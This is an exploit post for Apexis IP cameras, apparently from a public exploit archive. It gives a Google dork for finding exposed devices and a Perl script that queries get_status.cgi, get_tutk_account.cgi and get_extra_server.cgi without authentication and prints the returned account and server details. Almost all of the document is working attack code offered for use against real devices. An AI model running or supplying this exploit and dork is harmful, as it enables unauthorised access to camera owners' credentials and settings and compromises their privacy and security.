http://pastebin.com/AJ9eQvXc # Exploit Title: Apexis IP CAM - Full Info Disclosure # Google Dork: inurl:"get_status.cgi"cgi-bin/ # Date: 01/06/2015 # Exploit Author: Sunplace Solutions - Soluciones Informáticas - #RE Remoteexecution.net # Vendor Homepage: http://www.apexis.com.cn/ # Tested on: Linux [Exploit Code] #!/usr/bin/perl print "[ Apexis IP CAM - Full Info Disclosure ]\n"; print "[ Discovery by: Sunplace Solutions ]\n"; print "[ Exploit: Sunplace Solutions ]\n"; print "[ Greetz: www.remoteexecution.net - Daniel Godoy ]\n"; print "URL: "; $url=<STDIN>; use LWP::UserAgent; my $ua = LWP::UserAgent->new; $ua->agent('Mozilla/35.0 (compatible; MSIE 5.0; Windows 7)'); chop($url); if ($url eq "") { print 'URL dont empty!.'."\n"; } else { $www = new LWP::UserAgent; @path=split(/cgi-bin/,$url); $content = $www->get($url) or error(); print "\n[x]Trying to pwn =>".$path[1]."\n"; print "Result: \n"; $pwn = $content->content; $pwn=~ s/var//g; $pwn=~ s/ //g; $pwn=~ s/ret_//g; print $pwn; print "\n[x]Trying to pwn => /get_tutk_account\n"; print "Result: \n"; $content = $www->get($path[0]."cgi-bin/get_tutk_account.cgi") or error(); $pwn = $content->content; $pwn=~ s/var//g; $pwn=~ s/ret_//g; $pwn=~ s/ //g; print $pwn; print "\n[x]Trying to pwn => /get_extra_server.cgi\n"; print "Result: \n"; $content = $www->get($path[0]."cgi-bin/get_extra_server.cgi") or error(); $pwn = $content->content; $pwn=~ s/var//g; $pwn=~ s/ret_//g; $pwn=~ s/extra_//g; $pwn=~ s/ //g; print $pwn; }